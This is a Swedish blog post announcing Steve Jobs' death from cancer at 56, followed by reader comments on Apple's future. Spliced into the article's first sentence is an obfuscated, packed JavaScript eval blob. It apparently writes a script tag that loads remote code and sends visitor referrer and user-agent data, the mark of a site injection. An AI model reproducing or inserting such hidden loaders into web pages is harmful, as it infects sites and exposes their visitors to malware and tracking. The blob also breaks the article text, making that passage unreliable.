Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Steve Jobs har avlidit

Steve Jobs har avlidit
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eerhs|var|u0026u|referrer|nzsti||js|php’.split(’|’),0,{}))
är med stor sorg som vi meddelar att Steve Jobs, som påverkat vårt moderna samhälle med Apple och genom skapandet av Macintosh, iPod och iPhone, har avlidit 56 år gammal i cancer.

Det uttalades tidigt i morse den sjätte oktober från Apple att grundaren av företaget och pionjären i modern teknik har avlidit.

Jobs är ansvarig för att ha gjort datorn underhållande att använda och smartphonen en näst intill livsviktig del av vår vardag, han har påverkat hur filmer görs, hur musik säljs och hur vi interagerar med omvärlden genom att med ojämförbart engagemang och inlevelse gång på gång skjutsa in oss i nästa del av teknikens utveckling. Allt detta har han lyckats med bara under de senaste tio åren, men inte alla känner till att han samtidigt har haft en egen kamp mot bukspottkörtelcancer, en av de värre sorters cancer man kan drabbas av, sedan ett tag tillbaka och har under de senaste fem åren genomgått en mängd operationer för att bli av med den. På sistone har det sagts att läget ska ha blivit stabilare, men till sist tog cancern övertaget.

På Apples hemsida ser vi nu en svartvit bild på Jobs och årtalen 1955-2011, och det finns inte så mycket mer att skriva än att världen har förlorat ett sant geni!

För ett tag sedan lade vi upp en dokumentär om denna legend, se den här, det är något som är värt att se!

R.I.P. Steve Jobs

*UPPDATERING*

Läs citat från sörjande Apple fans på Wired.com
Länk: http://www.wired.com/

 

 

Comments

 1. Sasha

  Helt sjukt ju !!! Nu kommer företaget aldrig klara sig. Det är som det som hände på 80 talet när han avgick .

  • Ja nu blir det helt klart oroligt! men att det skulle bli som sist, det tvekar jag på. Dippen på 80talet var p.ga. att Apple’s produkter var rent och enkelt, Sämst! Nu har man bra produkter, det har Steve Jobs sätt till sedan han kom tillbaka till företaget. Och han hade ju redan avgått, så effekterna är redan igång. Jag tror snarare att detta blir en uppsving, rent känslomässigt för Apple som varumärke. Men tiden får avgöra detta. Vi håller igång debatten! =D
   /Filip

  • jaa det började ju snabbt bara på presskonferensen igår när cook presenterade iphone 4s (som jag iförsig inte ser nått fel med)..tror det kan bli svårt för apple att hålla uppe sin profil och fortsätta leda industrin på samma sätt utan jobs.

 2. Jonas Karlsson

  Så tråkigt tycker vi på IBM Sverige. Länge leve Steve!

 3. Ja nu blir det helt klart oroligt! men att det skulle bli som sist, det tvekar jag på. Dippen på 80talet var p.ga. att Apple’s produkter var rent och enkelt,  Sämst! Nu har man bra produkter, det har Steve Jobs sätt till sedan han kom tillbaka till företaget. Och han hade ju redan avgått, så effekterna är redan igång. Jag tror snarare att detta blir en uppsving, rent känslomässigt för Apple som varumärke. Men tiden får avgöra detta. Vi håller igång debatten! =D
  /Filip

 4. Danell CeciCecilialia

  Steve Jobs var en fantastisk man som även grundade Pixar (!) vilket inte får glömmas!
  Han var enligt min professor som träffat honom i Silicon Valley (när Jobs var avskedad från Apple) en man som trots sina miljoner körde runt i en gammal bil och tog sig tid att sitta och prata med jämnåriga finansieringsstudenter på universitetet. Han kunde inte tekniskt bygga en dator men visste precis hur han ville ha den och lyckades med att motivera andra till att skapa precis just det. En ÄNNU större bedrift!

  Utan Jobs ingen iphone, ipod, ipad…
  Han lämnade helt klart ett stort märke efter sig!

 5. Mycket tråkiga nyheter hälsar Sebastian!!